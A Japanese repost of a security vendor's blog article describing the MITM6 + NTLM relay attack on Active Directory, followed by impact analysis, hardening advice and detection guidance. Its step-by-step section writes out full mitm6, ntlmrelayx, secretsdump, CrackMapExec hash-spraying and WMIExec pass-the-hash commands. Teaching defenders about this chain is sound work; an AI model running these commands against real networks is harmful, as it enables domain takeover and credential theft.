TokyoBlackHatNews

resecurity.com 13分で読了

MITM6 + NTLM リレー:IPv6 自動構成がフルドメイン侵害につながる仕組み

はじめに

現代の Active Directory 環境では、攻撃者が必ずしもゼロデイやマルウェアを必要とするわけではありません。代わりに、管理者が見落としがちな既定の構成を悪用できます。その代表的な手法が MITM6 + NTLM リレー攻撃で、悪意のある IPv6 自動構成と NTLM リレーを組み合わせ、権限を昇格させてドメイン全体を侵害します。本記事では Resecurity が、ネットワーク基盤を対象とした Vulnerability Assessment and Penetration Testing(VAPT)プロジェクトで成功した際に用いられた手法の一部を共有します。これらの知見は、攻撃側のサイバーセキュリティ専門家にも、防御側のネットワーク担当者にも、潜在的リスクの軽減や構成の強化に役立つはずです。

攻撃の概要

MITM6 攻撃は、Windows 環境が既定で IPv6 をどのように扱うかを狙うネットワークベースの悪用手法です。組織が IPv6 を積極的に利用していない場合でも、Windows システムは起動時またはネットワーク接続時に自動的に DHCPv6 リクエストを送信します。

攻撃者が mitm6 を実行すると、偽の IPv6 DHCP サーバーとしてこれらのリクエストに応答し、被害端末に悪意のある DNS サーバーアドレスを割り当てられます。被害端末が攻撃者の DNS を信頼すると、名前解決リクエストはすべて傍受され、リダイレクト可能になります。

さらに Impacket の ntlmrelayx と組み合わせることで、この攻撃は特に強力になります。WPAD(Web Proxy Auto-Discovery Protocol)をスプーフィングし、NTLM 認証の試行をリレーすることで、攻撃者は資格情報を取得したり、他サービスへ中継したりできます。

Active Directory の既定構成により、認証済みユーザーは誰でもマシンアカウントを追加でき、Resource-Based Constrained Delegation(RBCD)を悪用できます。これにより攻撃者は特権アカウントになりすまし、重要システムへ不正アクセスできるようになり、最終的にドメイン全体の侵害につながる可能性があります。

要するに、MITM6 は IPv6 自動構成を、Windows ネットワークにおける資格情報窃取と権限昇格のパイプラインへと変えてしまうのです。

mitm6 + NTLM リレー攻撃が成立する理由

Windows マシンを起動すると、Windows が IPv6 を優先するため、まず DHCPv4 ではなく DHCPv6 によりネットワーク構成の取得を試みます。この挙動は、ネットワークが IPv6 を積極的に使用していない場合でも存在します。

既定では、認証済みのドメインユーザーは最大 10 台までコンピューター(マシンアカウント)をドメインに追加できます。特別な権限は不要です。これは Active Directory の ms-DS-MachineAccountQuota 属性で制御されます。

加えて、AD のコンピューターアカウントは LDAP を介して、自身のオブジェクトの特定属性を変更できます。その 1 つが msDS-AllowedToActOnBehalfOfOtherIdentity で、Resource-Based Constrained Delegation(RBCD)に使用されます。

攻撃者が AD 内でコンピューターオブジェクトを作成または制御できれば、RBCD を構成して、攻撃者が制御するマシンアカウントに特権アカウントのなりすましを許可できます。このなりすましは、コマンド実行やリソースアクセスに利用でき、最終的に Domain Controller を含む標的ホストの侵害へとつながります。

攻撃チェーンの流れ

Image

ステップ 1 – 偽の DHCPv6 サーバーになる

mitm6 を実行して、偽の DHCPv6 および DNS サーバーとして動作させます。

Sudo mitm6 –d target.local --no-ra

Image

ステップ 2 – 認証を LDAP にリレーする

  • AD 内に悪意のあるコンピューターアカウントを作成
  • そのプロパティを変更し、ID のなりすましを許可

Sudo impacket-ntlmrelayx –ts –6 -t ldaps://target.local -wh fakewpad –add-computer –delegate-acces

Image

ステップ 3 – ハッシュのダンプ

悪意のあるコンピューターアカウントが作成され、ID のなりすましを許可するようにプロパティが変更されたので、ドメインからパスワードハッシュをダンプできます。

ntlmrelayx を通じて作成したばかりのアカウントのユーザー名とパスワードを使用します。

Secretsdump.py “target.local/User:[email protected]

Image

ステップ 4 – アクセス可能なホストの特定

有効な NTLM ハッシュ(Administrator、サービスアカウント、その他の特権ユーザー由来など)を入手したら、次はこれらの資格情報でドメイン内のどのシステムにアクセスできるかを特定します。CrackMapExec を使えば、広範な IP アドレスに対して認証テストを実行できます。

ここで CrackMapExec(CME)が強力なツールになります。多数のホストに対して資格情報をスプレーし、認証の成否確認や利用可能な SMB 共有の列挙が可能です。異なるユーザーに属する複数のハッシュがある場合もあるため、環境に対してそれぞれをテストするのがベストプラクティスです。CIDR 範囲を使うことで、内部ネットワークを可能な限り広くカバーできます。

  1. Administrator のハッシュを 10.0.0.0/8 全体でテスト

    2. Crackmapexec smb 10.0.0.1/8 -u administrator –H 1f937b21e2e0ada0d3d3f7cf58c8aade –share

    Image
  2. AD manager アカウントをテスト

    3. Crackmapexec smb 10.0.0.1/8 -u “ADmanager” –H 1f937b27yt60ada0d3d3f7cf58c8aade –share

    Image
  3. KESadmin アカウントをテスト

    4. Crackmapexec smb 10.0.0.1/8 -u “KESadmin” –H 3k9i7b21e2e0ada0d3d3f7cf58c8vdde –share

    Image
  4. SQL admin アカウントをテスト

    5. Crackmapexec smb 10.0.0.1/8 -u sqladmin –H 1f97yf4de2e0ada0d3d3f7cf58c8aade –share

    Image

ステップ 5 – 侵害したマシンの制御を奪取

盗んだハッシュでアクセス可能なシステムを特定したら、次はログインしてそれらのマシンを制御します。この段階では、横展開から永続化およびシステム掌握へ移行します。

これを実現する方法はいくつかあります:

  • WMIExec(ステルス性が高く、ファイルアップロード不要 – Red Team/ペンテストに最適)
  • PsExec(より対話的で、リモートホストにサービスを配置 – 明示的な許可がある場合に有用)

WMIExec の例:

  1. Administrator のハッシュを使用

    2. Wmiexec target.local/[email protected] -no-pass –hashes “aad3b435b51404eeaad3b435b51536ee:1f937b56ihe0ada02edf377yr8c8aade”

    Image
  2. KESadmin のハッシュを使用

    3. Wmiexec target.local/[email protected] -no-pass –hashes “aad3b876b51404zzaad3b435b5gt23ee:1f937b6se2e0ad6y2edf37cf58c8aade”

    Image
  3. SQLadmin のハッシュを使用

    4. Wmiexec target.local/[email protected] -no-pass –hashes “aad3b435b51404eeaad3b435b5yh23ee:1f937b53e2e0ada0265f37cf58c8aade”

    Image

攻撃の影響

MITM6 + NTLM リレー攻撃は、ネットワーク傍受と権限昇格手法を組み合わせるため、Active Directory 環境に深刻な影響を与えます。攻撃者がこの攻撃を成功させると、次のような影響が起こり得ます:

  • ドメイン全体の侵害
    Resource-Based Constrained Delegation(RBCD)を悪用し、NTLM 資格情報を Domain Controller にリレーすることで、攻撃者は(Domain Admin などの)特権アカウントになりすませます。これにより Active Directory 環境を完全に制御できます
  • 資格情報の窃取
    攻撃者は NTLM ハッシュ、Kerberos チケット、場合によっては平文パスワードまで取得できます。これらの資格情報は横展開に再利用されたり、アンダーグラウンドフォーラムで販売されたりします
  • 横展開
    有効な資格情報があれば、攻撃者はネットワーク内を移動し、ファイル共有、メールサーバー、重要インフラへアクセスできます。これによりマルウェアやランサムウェアを拡散できます
  • 永続化
    侵害されたマシンアカウントや新規作成された不正アカウントがドメイン内に残され、初期侵入点が発見・除去されても攻撃者に長期的なアクセスを提供する可能性があります
  • サービス妨害
    攻撃中に DNS が汚染されるため、正規サービスが妨害されたりリダイレクトされたりして、エンドユーザーの停止や性能劣化を引き起こす可能性があります
  • データ流出
    機密アカウントやシステムへのアクセスにより、攻撃者は専有データ、知的財産、個人情報を持ち出せます。これにより情報漏えいやコンプライアンス違反につながります
  • 評判および金銭的損害
    攻撃が成功すると、規制当局の罰金、顧客の信頼喪失、高額なインシデント対応および復旧コストにつながる可能性があります。

推奨事項と対策

MITM6 + NTLM リレー攻撃は Windows と Active Directory の既定動作を悪用するため、緩和にはネットワークの強化と Active Directory 構成変更の組み合わせが必要です。

ネットワークレベルの防御

  • 未使用なら IPv6 を無効化
    環境で IPv6 が不要であれば、すべてのエンドポイントとサーバーで無効化し、不正な DHCPv6 広告が処理されないようにします。
  • DHCPv6 と Router Advertisement をブロック
    RA Guard / DHCPv6 Guard を備えたスイッチやルーターを使用し、ネットワーク上の不正な IPv6 広告や偽 DHCP サーバーをブロックします。
  • ネットワークトラフィックのセグメント化
    ユーザー、サーバー、Domain Controller を別々の VLAN に分離し、エンドポイントのブロードキャスト/マルチキャスト露出を制限します。

認証の強化

  • SMB 署名と LDAP 署名を強制
    SMB と LDAP トラフィックに署名を必須化し、NTLM リレー攻撃を防止します。
  • 可能な限り NTLM を無効化
    可能であれば Kerberos のみに移行します。NTLM が必要な場合は、NTLM 認証を受け付けられるサーバーを制限します。
  • Extended Protection for Authentication(EPA)を有効化
    認証リクエストにチャネルバインディングトークンを追加し、リレー攻撃を困難にします。

Active Directory の構成

  • Set ms-DS-MachineAccountQuota = 0
    低権限ユーザーがドメインに新しいコンピューターアカウントを作成できないようにします。
  • RBCD の利用を監査・制限
    Resource-Based Constrained Delegation(RBCD)を構成できる主体を監視し、制限します。
  • 特権アカウントの強化
    Domain Admin などの高権限アカウントが、信頼できないシステムに対して認証できないようにします。

監視と検知

  • 不正な DHCPv6 サーバーを検知
    IDS/IPS や Zeek/Suricata などのツールを用いて、不審な DHCPv6 広告を監視します。
  • アカウント作成を監視
    AD における不審なコンピューターアカウントの作成や変更をアラートします。
  • NTLM リレーの兆候を確認
    認証失敗、プロキシ認証の試行、異常な LDAP リクエストを追跡します。

結論

MITM6 + NTLM リレー攻撃は、小さな構成上の見落としが連鎖して、Active Directory の全面的な侵害に至り得ることを示す典型例です。多くの企業環境では IPv6 が積極的に展開されていないにもかかわらず、Windows システムにおける既定の存在と優先度が、攻撃者に容易に悪用される攻撃面を生み出します。

不正な DHCPv6 応答、DNS ポイズニング、WPAD 悪用、NTLM リレーを組み合わせることで、攻撃者はわずか数分で、未認証のネットワークアクセスから Domain Admin の完全制御へと密かに権限を引き上げられます。

教訓は明確です。セキュリティとは脆弱性のパッチ適用だけではなく、既定設定の強化、未使用プロトコルの無効化、環境内の信頼前提の最小化にあります。組織は次のような多層的アプローチを取る必要があります:

  • 攻撃面の縮小(未使用なら IPv6 を無効化、NTLM を制限)
  • 強固な認証の強制(LDAP/SMB 署名、Kerberos)
  • 異常の監視(不正 DHCPv6 サーバー、想定外のマシンアカウント)

プロアクティブなレッドチーミングと継続的な監視を組み合わせることで、攻撃者がレガシープロトコルや誤設定を悪用してドメインを乗っ取ることを防げます。

要するに、MITM6 はペネトレーションテスターのツールであるだけでなく、防御側に AD のセキュリティ態勢を見直すよう促す警鐘でもあります。

当社の専門家は以下の業界資格を保有しており、Fortune 500 の主要企業や政府機関との成功実績を豊富に有しています:

  • CISSP
    (Certified Information Systems Security Professional)
  • CEH
    (Certified Ethical Hacker)
  • CISA
    (Certified Information Systems Auditor)
  • GIAC
    GCIH(Certified Incident Handler)
  • Offensive
    Security Certified Professional(OSCP)
  • GIAC
    Web Application Penetration Tester(GWAPT)
  • eLearnSecurity
    Certified Penetration Tester eXtreme(eCPTX)
  • eLearnSecurity
    Web Application Penetration Tester Extreme(eWPTXv2)
  • eLearnSecurity
    Certified Professional Penetration Tester(eCPPTv2)
  • Attify
    Certified IoT Security Pentester(ACIP)
  • eLearnSecurity
    Mobile Application Penetration Tester(eMAPT)
  • Certified
    Red Team Professional(CRTP)
  • CREST
    Registered Penetration Tester(CRT)
  • CREST
    Practitioner Security Analyst(CPSA)

いつでも [email protected] までお気軽にご連絡ください。
当社の専門家が、ペネトレーションテスト、レッドチーム演習、サイバーセキュリティ評価について喜んで支援いたします。Resecurity による VAPT(Vulnerability Assessment and Penetration Testing)サービスの詳細については、こちらのページをご覧ください。

翻訳元: https://www.resecurity.com/blog/article/mitm6-ntlm-relay-how-ipv6-auto-configuration-leads-to-full-domain-compromise

ソース: resecurity.com
#Active Directory #DHCPv6スプーフィング #DNSポイズニング #IPv6自動設定 #MITM6 #NTLMリレー攻撃 #RBCD(リソースベース制約付き委任) #Windowsネットワークセキュリティ #WPAD悪用 #ドメイン侵害

関連記事

CVE-2026-20182:vHub認証バイパスによる無認証Cisco SD-WAN制御プレーン侵害

Mini Shai-Hulud: PyTorch LightningとIntercom Clientに対するクロスエコシステムサプライチェーン攻撃

CVE-2026-25874: Hugging Face LeRobotのPickle逆シリアル化を経由した認証なしRCE